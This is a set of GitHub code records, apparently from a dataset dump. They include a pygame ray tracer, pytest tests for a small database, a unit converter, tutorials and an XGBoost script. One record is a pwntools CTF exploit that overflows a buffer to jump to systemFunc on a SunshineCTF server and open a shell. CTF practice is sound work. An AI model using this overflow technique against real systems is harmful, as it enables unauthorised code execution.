), radius=0.5/10, height=8, material=white_opaque))\nv0 = [-2.5/4, -2.5/4, 0]\nv1 = [2.5/4, -2.5/4, 0]\nv2 = [0, 2.5/4, 0]\n\n#triangulo = Triangle(v0, v1, v2, brick)\n#raytracer.scene.append(triangulo)\n\n\nraytracer.scene.append(OBB(position=[-2, -1.25, -4], size=[2, 2, 2], rotation_matrix=[[1, 0, 0], [0, 1, 0], [0, 0, 1]], material=box))\nraytracer.scene.append(OBB(position=[1.5, -1.25, -4], size=[2, 2, 2], rotation_matrix=[[1, 0, 0], [0, 1, 0], [0, 0, 1]], material=box))\n\nraytracer.scene.append(AABB(position=(-2.5, -2.8, -7), size=(1,1,1), material=diamond))\n#raytracer.scene.append(AABB(position=(-6.5, -1.2, -7), size=(1.2,1.5,1), material=regalo))\nraytracer.scene.append(AABB(position=(3.5, -2.8, -7), size=(1,1,1), material=diamond))\n\n\n\nraytracer.lights.append(AmbientLight(intensity=0.6))\nraytracer.lights.append(DirectionalLight(direction=(0, -1, 0), intensity=0.9))\n\n\n\nraytracer.rtClear()\nraytracer.rtRender()\n\nprint(\"\\nRender Time:\", pygame.time.get_ticks() / 1000, \"secs\")\n\nisRunning = True\nwhile isRunning:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            isRunning = False\n        elif event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_ESCAPE:\n                isRunning = False\n\npygame.quit()\n","repo_name":"AGM54/PROYECTO2DEGRAFICAS","sub_path":"RayTracer.py","file_name":"RayTracer.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73097568869","text":"#!/usr/bin/env python3\nimport subprocess\nfrom itertools import product\n\nimport re\nimport sys\nfrom io import StringIO\n\nimport pytest\nfrom tests import test_sets\n\n\ndef make_output(column_names, output):\n    f = StringIO()\n    f.write(\" \".join(column_names) + \"\\n\")\n    for t in output:\n        if isinstance(t, int):\n            t = [t]\n        f.write(\" \".join(map(str, t)) + \"\\n\")\n    return f.getvalue()\n\n\ndef write_outputs(tmpdir, outputs):\n    with open(tmpdir / \"out\") as f:\n        for n, output in enumerate(outputs, start=1):\n            f.write(\"query number: %d\\n\" % n)\n            f.write(output)\n\n\ndef make_csv(column_names, values, key_len):\n    f = StringIO()\n    f.write(\" \".join(column_names) + \"; %d\\n\" % key_len)\n    for v in values:\n        if isinstance(v, int):\n            v = [v]\n        f.write(\" \".join(map(str, v)) + \"\\n\")\n    return f.getvalue()\n\n\ndef write_csv(tmpdir, csv):\n    (tmpdir / \"csv\").write(csv)\n\n\ndef write_queries(tmpdir, queries):\n    with (tmpdir / \"in\").open(\"w\") as f:\n        for query in queries:\n            f.write(query + \"\\n\")\n\n\ndef make_query(columns, intervalslist):\n    preds = []\n    for column, intervals in zip(columns, intervalslist):\n        for interval in intervals:\n            preds.append(column + \"=\" + interval)\n    return \"select %s where %s\" % (\", \".join(columns), \", \".join(preds))\n\n\nfullscan_col_re = re.compile(\"^plan: Range scan result: \\(first_remaining_column=(\\d+)*\")\n\n\ndef extract_first_remaining_column(lines):\n    results = []\n    for line in lines:\n        if line.startswith(\"plan:\"):\n            res = fullscan_col_re.match(line)\n            if not res:\n                continue\n            results.append(int(res.group(1)))\n    return results\n\n\ndef read_err(tmpdir):\n    with (tmpdir / \"err\").open(\"r\") as f:\n        return list(f)\n\n\ndef extract_results(lines):\n    results = []\n    current_result = []\n    current_header = []\n    for l in lines:\n        l = l.rstrip()\n        if not l:\n            continue\n        if l.startswith(\"query number:\"):\n            if current_header:\n                results.append((current_header, current_result))\n            current_header = []\n            current_result = []\n            continue\n        t = l.split(\" \")\n        if not current_header:\n            current_header = t\n        else:\n            current_result.append(list(map(int, t)))\n    if current_header:\n        results.append((current_header, current_result))\n    return results\n\n\ndef read_out(tmpdir):\n    with (tmpdir / \"out\").open(\"r\") as f:\n        return list(f)\n\n\ndef test_make_query():\n    intervals = [\"[1..2)\", \"[3..3]\"]\n\n    res = make_query([\"c\"], [intervals])\n\n    assert res == \"select c where c=[1..2), c=[3..3]\"\n\n\ndef test_make_csv():\n    cols = [\"a\"]\n    vals = [1, 2]\n\n    res = make_csv(cols, vals, 1).rstrip().split(\"\\n\")\n\n    assert res == [\"a; 1\", \"1\", \"2\"]\n\n\ndef test_extract_first_remaining_column():\n    s = [\"dupa\", \"plan: dupa\",\n         \"plan: Range scan result: (first_remaining_column=3, rows=<1..2>)\",\n         \"plan: Range scan result: (first_remaining_column=4, rows=<1..2>)\"]\n\n    res = extract_first_remaining_column(s)\n\n    assert res == [3, 4]\n\n\ndef test_extract_results():\n    lines = [\n        \"\",\n        \" \",\n        \"query number:\",\n        \"a b c \\n\",\n        \"1 1 1 \",\n        \"2 2 2 \",\n        \"query number: 1\",\n        \"a\",\n        \"4\",\n        \"query number: 2\",\n        \"q\"\n    ]\n\n    results = extract_results(lines)\n\n    assert results == [\n        ([\"a\", \"b\", \"c\"], [[1, 1, 1], [2, 2, 2]]),\n        ([\"a\"], [[4]]),\n        ([\"q\"], [])\n    ]\n\n\n# noinspection PyShadowingNames\ndef call_planty_db(tmpdir, plantydb):\n    return subprocess.run(\"{plantydb} {csv} < {inp} 1> {out} 2> {err}\".format(\n        plantydb=plantydb, csv=tmpdir / \"csv\", inp=tmpdir / \"in\", out=tmpdir / \"out\",\n        err=tmpdir / \"err\"), shell=True).returncode\n\n\n@pytest.mark.parametrize(\"test_input,key_len,intervals_reversed\",\n                         product(test_sets.interval_pairs, [0, 1], [True, False]))\ndef test_interval_pair(tmpdir, plantydb, test_input, key_len, intervals_reversed):\n    intervals, results, _ = test_input\n    if intervals_reversed:\n        intervals.reverse()\n    write_queries(tmpdir, [make_query([\"c\"], [intervals])])\n    write_csv(tmpdir, make_csv([\"c\"], test_sets.column, key_len=key_len))\n\n    rc = call_planty_db(tmpdir, plantydb)\n\n    assert rc == 0\n    assert [([\"c\"], [[r] for r in results])] == extract_results(read_out(tmpdir))\n\n\n@pytest.mark.parametrize(\"test_input,key_len\",\n                         product(\n                             test_sets.interval_singles + test_sets.intervals_in_relation_to_data,\n                             [0, 1]))\ndef test_interval_single(tmpdir, plantydb, test_input, key_len):\n    interval, results, _ = test_input\n    write_queries(tmpdir, [make_query([\"c\"], [[interval]])])\n    write_csv(tmpdir, make_csv([\"c\"], test_sets.column, key_len=key_len))\n\n    rc = call_planty_db(tmpdir, plantydb)\n\n    assert rc == 0\n    assert [([\"c\"], [[r] for r in results])] == extract_results(read_out(tmpdir))\n\n\n@pytest.mark.parametrize(\"case\", test_sets.plan_tests)\ndef test_plan(tmpdir, plantydb, case: test_sets.case):\n    cols = [\"c%d\" % c for c in range(case.columns_count)]\n    write_queries(tmpdir, [make_query(cols, [[x] for x in case.preds])])\n    write_csv(tmpdir, make_csv(cols, case.values, case.keylen))\n\n    rc = call_planty_db(tmpdir, plantydb)\n\n    assert rc == 0\n    assert [case.result.fullscan_column] == extract_first_remaining_column(read_err(tmpdir))\n\n\n@pytest.mark.parametrize(\"case\", test_sets.OutputOrderingTests.cases)\ndef test_output_ordering(tmpdir, plantydb, case: test_sets.OutputOrderingTests.case):\n    cols = [\"c%d\" % c for c in range(case.columns_count)]\n    write_queries(tmpdir, [make_query(cols, [[x] for x in case.preds])])\n    write_csv(tmpdir, make_csv(cols, case.values, 0))\n\n    rc = call_planty_db(tmpdir, plantydb)\n\n    assert rc == 0\n    assert [(cols, [list(x) for x in case.result])] == extract_results(read_out(tmpdir))\n\n\n@pytest.mark.parametrize(\"key_len\", [0, 1])\ndef test_empty_csv(tmpdir, plantydb, key_len):\n    cols = [\"c0\", \"c1\"]\n    write_csv(tmpdir, make_csv(cols, [], key_len))\n    write_queries(tmpdir, [make_query(cols, [[\"0\", \"[1..)\"], [\"(..1]\", \"2\"]])])\n\n    rc = call_planty_db(tmpdir, plantydb)\n\n    assert rc == 0\n    assert [(cols, [])] == extract_results(read_out(tmpdir))\n\n\n@pytest.mark.parametrize(\"key_len\", [0, 1])\ndef test_empty_csv(tmpdir, plantydb, key_len):\n    cols = [\"c0\", \"c1\"]\n    write_csv(tmpdir, make_csv(cols, [], key_len))\n    write_queries(tmpdir, [make_query(cols, [[\"0\", \"[1..)\"], [\"(..1]\", \"2\"]])])\n\n    rc = call_planty_db(tmpdir, plantydb)\n\n    assert rc == 0\n    assert [(cols, [])] == extract_results(read_out(tmpdir))\n\n\ndef test_no_where(tmpdir, plantydb):\n    cols = [\"a\"]\n    write_csv(tmpdir, make_csv(cols, [[1]], 0))\n    write_queries(tmpdir, [\"select a\"])\n\n    rc = call_planty_db(tmpdir, plantydb)\n\n    assert rc == 0\n    assert [(cols, [[1]])] == extract_results(read_out(tmpdir))\n\n\ndef test_select(tmpdir, plantydb):\n    cols = [\"a\", \"b\", \"c\"]\n    write_csv(tmpdir, make_csv(cols, [[1, 2, 3]], 0))\n    write_queries(tmpdir, [\n        \"select a\",\n        \"select b, a\",\n        \"select *\",\n        \"select *, a\"\n    ])\n\n    rc = call_planty_db(tmpdir, plantydb)\n\n    assert rc == 0\n    assert [([\"a\"], [[1]]),\n            ([\"b\", \"a\"], [[2, 1]]),\n            ([\"a\", \"b\", \"c\"], [[1, 2, 3]]),\n            ([\"a\", \"b\", \"c\", \"a\"], [[1, 2, 3, 1]])\n            ] == extract_results(read_out(tmpdir))\n\n\ndef test_wrong_column(tmpdir, plantydb):\n    cols = [\"a\"]\n    write_csv(tmpdir, make_csv(cols, [], 0))\n    write_queries(tmpdir, [make_query(\"select b\", [])])\n\n    rc = call_planty_db(tmpdir, plantydb)\n\n    assert rc == 0\n    assert [\"query error: unknown column name: s\"] == [l.rstrip() for l in read_out(tmpdir)]\n\n\ndef test_unsorted_key_column(tmpdir, plantydb):\n    cols = [\"a\", \"b\"]\n    write_csv(tmpdir, make_csv(cols, [[1, 2], [1, 1]], 2))\n    write_queries(tmpdir, [])\n\n    rc = call_planty_db(tmpdir, plantydb)\n\n    assert rc == 26\n    assert [\"table error: key of row 1 is lesser than previous row\"] == \\\n        [l.rstrip() for l in read_out(tmpdir)]\n\n\ndef test_syntax_errors(tmpdir, plantydb):\n    cols = [\"a\", \"b\"]\n    write_csv(tmpdir, make_csv(cols, [[1, 2]], 2))\n    write_queries(tmpdir, [\n        \"\",\n        \"select a, where b=1\",\n        \"select a,\",\n        \"select a b where a=1\",\n        \"select a b\",\n        \"select where a=1\",\n        \"select\",\n        \"select a where a=1,\",\n        \"select a where a=1 b=1\",\n        \"select a where\",\n        \"select a where a=\",\n        \"select a where a=b\",\n        \"select a where =[..1)\",\n        \"select a where a=[1..1\",\n        \"select a where a=1..1]\",\n        \"select a where a=[1-1]\",\n        \"select a where a=[a..2]\",\n        \"select a where a=1 \"\n    ])\n\n    rc = call_planty_db(tmpdir, plantydb)\n\n    assert rc == 0\n    assert ['query error: no select at the beginning',\n            'query error: unknown column name: where',\n            'query error: no comma after select list',\n            \"query error: something else than 'where' after select list: b\",\n            \"query error: something else than 'where' after select list: b\",\n            'query error: unknown column name: where',\n            'query error: select list empty',\n            'query error: no comma after where list',\n            \"query error: there's something after 'where': b=1\",\n            'query error: where list empty',\n            'query error: Error during converting to integer:',\n            'query error: Error during converting to integer: b',\n            'query error: unknown column name:',\n            'query error: bad range close: [1..1',\n            'query error: bad range open: 1..1]',\n            'query error: Error during converting to integer: [1-1]',\n            'query error: Error during converting to integer: a',\n            'query number: 1', 'a', '1'] == \\\n        [l.rstrip() for l in read_out(tmpdir)]\n\nif __name__ == \"__main__\":\n    exit(pytest.main(sys.argv))","repo_name":"k-stanislawek/planty-db","sub_path":"dev_scripts/runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":10144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"72840222949","text":"from pwn import *\r\n\r\nbinary = context.binary = ELF('./chall_13')\r\npayload = b'A'*0x3e\r\npayload += p32(binary.sym.systemFunc)\r\np = remote('chal.2020.sunshinectf.org',30013)\r\np.sendline('IxZ')\r\np.sendline(payload)\r\nprint(payload)\r\np.interactive()\r\n\r\n","repo_name":"IxZZZ/CTF","sub_path":"CTF_2020/sunshinectf.2020/Solution/exploit13.py","file_name":"exploit13.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"71848330791","text":"while 1:\n    print('CONVERSOR DE UNIDADES: MILHA x KM\\n')\n    print('''Escolha um número:\n    1- Milhas para km\n    2 - Km para milhas''')\n    opcao = int(input('Digite aqui: '))\n    if opcao == 1:\n        milhas = float(input('Quantas milhas? '))\n        km = milhas * 1.60934\n        print(f'\\n{milhas} milhas valem {km:.2f}km')\n        input('Pressione qualquer tecla para continuar\\n\\n')\n    if opcao == 2:\n        km = float(input('Quantos km? '))\n        milha = km * 0.621371\n        print(f'\\n{km}km valem {milha:.2f} milhas')\n        input('Pressione qualquer tecla para continuar\\n\\n')\n","repo_name":"JoaoPROFECIA/pycharm-curso-em-video","sub_path":"pythonProject/Curso Mundo 1/ex008b - conversor de unidades milha x km.py","file_name":"ex008b - conversor de unidades milha x km.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34883661057","text":"#!/bin/python3\nimport sys\n\n# return True if G contains P\ndef contains(G, P):\n    first_line = P[0]\n    sub_len = len(first_line)\n    for g_idx in range(len(G) - len(P) + 1):\n        try:\n            start_idx = 0\n            row = G[g_idx]\n            while(1):\n                idx = row.index(first_line, start_idx)\n                start_idx = idx+1\n                if len(P) == 1 or all(lineG[idx:idx+sub_len] == lineP for lineP, lineG in zip(P[1:], G[g_idx+1:])):\n                    return True\n            \n        except ValueError:\n            pass\n    return False\n\n    \nt = int(input().strip())\nfor _ in range(t):\n    R,C = input().strip().split(' ')\n    R,C = [int(R),int(C)]\n    G = []\n    G_i = 0\n    for _ in range(R):\n        G_t = str(input().strip())\n        G.append(G_t)\n    r,c = input().strip().split(' ')\n    r,c = [int(r),int(c)]\n    P = []\n    P_i = 0\n    for _ in range(r):\n        P_t = str(input().strip())\n        P.append(P_t)\n    \n    ans = contains(G, P)\n    print(\"YES\" if ans else \"NO\")\n","repo_name":"LysanderGG/HackerRank","sub_path":"Algorithms/Implementation/TheGridSearch.py","file_name":"TheGridSearch.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"15308100663","text":"\"\"\"\nGroupby\n\nAgrupa elementos de acordo com propriedades comuns.\nÉ obrigatório que o conjunto esteja ordenado pela propriedade escolhida.\n\"\"\"\n\nfrom itertools import groupby\n\nalunos = [\n    {'nome': 'Luiz'     , 'nota': 'A'},\n    {'nome': 'Letícia'  , 'nota': 'B'},\n    {'nome': 'Fabrício' , 'nota': 'A'},\n    {'nome': 'Rosemary' , 'nota': 'C'},\n    {'nome': 'Joana'    , 'nota': 'D'},\n    {'nome': 'João'     , 'nota': 'A'},\n    {'nome': 'Eduardo'  , 'nota': 'B'},\n    {'nome': 'André'    , 'nota': 'A'},\n    {'nome': 'Anderson' , 'nota': 'C'},\n    {'nome': 'José'     , 'nota': 'B'},\n]\n\nnota = lambda aluno: aluno['nota']\n\nprint('Ordena por nota')\nalunos.sort(key=nota)\n\nfor aluno in alunos:\n    print(aluno)\n\nprint('\\nAgrupa por nota')\nalunos_agrupados = groupby(alunos, nota)  # Notas devem estar ordenadas !!\nlista_aluno = list()\n\nfor nota, grupo in alunos_agrupados:\n    print(f'Nota: {nota}, grupo:')\n    lista_aluno = list(grupo)\n\n    for aluno in lista_aluno:\n        print(f'\\t{aluno}')\n\n    print(f'\\tQuantidade de alunos: {len(lista_aluno)}\\n')\n","repo_name":"axellbrendow/python3-basic-to-advanced","sub_path":"aula041-groupby/aula41.py","file_name":"aula41.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"20022500324","text":"# Computer muss raten\r\nimport random\r\nRegel = \"DU denkst dir eine Zahl zwischen 1 und 1000.\"\r\nprint(Regel)\r\nprint(\"Merk sie dir gut! Ich rate:\")\r\nUnten = 1\r\nOben = 1000 \r\nVersuche = 0\r\nInfo = \"\"\r\nwhile Info != \"richtig\" :\r\n    Versuche += 1\r\n    Zahl = int((Oben+Unten)/2)\r\n    print(str(Versuche) + \". Versuch: \" + str(Zahl))\r\n    print(\"Ist die Zahl richtig/zu klein/zu groß? \", end=\"\")\r\n    Info = input()\r\n    if Info == \"zu klein\" :\r\n        Unten = Zahl\r\n    if Info == \"zu groß\" :\r\n        Oben = Zahl\r\n    if Info == \"richtig\" : \r\n        print(\"OK - \", end=\"\")\r\n    else :\r\n        print(\"Schade - \", end=\"\")\r\nprint(\"Das waren \" + str(Versuche) + \" Versuche.\")\r\n\r\n","repo_name":"schnow265/random-stuff","sub_path":"Old Projects/python-archive/Spickzettel/raten5.py","file_name":"raten5.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"12006270918","text":"import pygame\nfrom pygame import color\n\npygame.init()\nwidth = 600\nheight = 600\ndisplay = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"mouse\")\nimage = pygame.image.load(\"微信图片_20220406155921.jpg\")\nrect = image.get_rect()\nrect.topleft = (25, 25)\n\nrunning = True\nwhile running:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n        if event.type == pygame.MOUSEBUTTONDOWN:\n            print(event)\n            mouse_x = event.pos[0]\n            mouse_y = event.pos[1]\n            rect.centerx = mouse_x\n            rect.centery = mouse_y\n        if event.type == pygame.MOUSEMOTION and event.buttons[0]==1:\n            print(event)\n            mouse_x = event.pos[0]\n            mouse_y = event.pos[1]\n            rect.centerx = mouse_x\n            rect.centery = mouse_y\n    display.fill((0, 0, 0))\n    display.blit(image, rect)\n    pygame.display.update()\npygame.quit()\n","repo_name":"cycleing2/pythonProject8","sub_path":"mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39607456985","text":"import numpy as np\r\n\r\nfrom UCTB.dataset import NodeTrafficLoader\r\nfrom UCTB.model import XGBoost\r\nfrom UCTB.evaluation import metric\r\n\r\ndata_loader = NodeTrafficLoader(dataset='Bike', city='DC', closeness_len=6, period_len=7, trend_len=4,\r\n                                with_lm=False, normalize=False)\r\n\r\nprediction_test = []\r\n\r\nfor i in range(data_loader.station_number):\r\n\r\n    print('*************************************************************')\r\n    print('Station', i)\r\n\r\n    model = XGBoost(n_estimators=100, max_depth=3, objective='reg:squarederror')\r\n\r\n    model.fit(np.concatenate((data_loader.train_closeness[:, i, :, 0],\r\n                              data_loader.train_period[:, i, :, 0],\r\n                              data_loader.train_trend[:, i, :, 0],), axis=-1),\r\n              data_loader.train_y[:, i, 0])\r\n\r\n    p_test = model.predict(np.concatenate((data_loader.test_closeness[:, i, :, 0],\r\n                                           data_loader.test_period[:, i, :, 0],\r\n                                           data_loader.test_trend[:, i, :, 0],), axis=-1))\r\n\r\n    prediction_test.append(p_test.reshape([-1, 1, 1]))\r\n\r\nprediction_test = np.concatenate(prediction_test, axis=-2)\r\n\r\nprint('Test RMSE', metric.rmse(prediction_test, data_loader.test_y, threshold=0))","repo_name":"uctb/UCTB","sub_path":"QuickStarts/XGBoost.py","file_name":"XGBoost.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"71"}